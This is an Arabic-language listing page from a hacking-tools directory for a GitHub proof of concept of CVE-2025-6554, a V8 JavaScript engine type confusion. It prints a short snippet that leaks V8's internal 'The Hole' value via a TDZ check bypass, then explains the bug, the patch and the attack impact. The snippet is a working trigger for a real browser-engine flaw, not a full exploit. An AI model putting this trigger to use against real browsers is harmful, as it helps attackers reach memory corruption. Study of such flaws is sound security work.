Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-6554 — إثبات المفهوم لـ CVE-2025-6554: ارتباك نوع محرك JavaScript V8 عبر تجاوز TDZ في حذف السلسلة الاختيارية، مما يتيح هروب The Hole لفساد الذاكرة. | Kitploit
أدوات/GitHubGitHub/pwntoday/cve-2025-6554
تحليل الثغرات الأمنيةالاستغلالالأوراق والأبحاثالتعلم والتعليماستغلال الملفات الثنائية
GitHubpwntoday/cve-2025-6554

CVE-2025-6554

إثبات المفهوم لـ CVE-2025-6554: ارتباك نوع محرك JavaScript V8 عبر تجاوز TDZ في حذف السلسلة الاختيارية، مما يتيح هروب The Hole لفساد الذاكرة.

عرض المستودع
2منذ 11 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-6554

root@kitploit:~
function leak_hole() {
    let x;
    delete x?.[y]?.a;
    return y;
    let y;
}
function pwn() {
    let hole = leak_hole();
    %DebugPrint(hole);
}
pwn();

الخلل

تم الوصول إلى المتغير y قبل الإعلان عنه. في العادة، يجب أن يؤدي هذا إلى خطأ ReferenceError (المنطقة الميتة المؤقتة TDZ)، لكن في الإصدارات الأقدم من V8، عندما يُدمج مع delete x?.[y]، فشل الفحص وأعاد القيمة الداخلية الاحتياطية "The Hole".

قبل التصحيح

كان V8 يفحص TDZ مرة واحدة فقط، ثم يفترض خطأً أن y صالح. وهذا سمح لـ "The Hole" بالتسرب إلى كود المستخدم.

الإصلاح

يفرض التصحيح فحصًا جديدًا لـ TDZ (ThrowReferenceErrorIfHole) في كل وصول، مما يضمن أن y قبل التهيئة يرمي خطأً دائمًا.

التأثير: يمكن للمهاجمين التقاط "The Hole" وإساءة استخدامه للخلط بين الأنواع (type confusion)، أو حيل المكدس، أو تجاوز النطاق.

تنزيل الأداة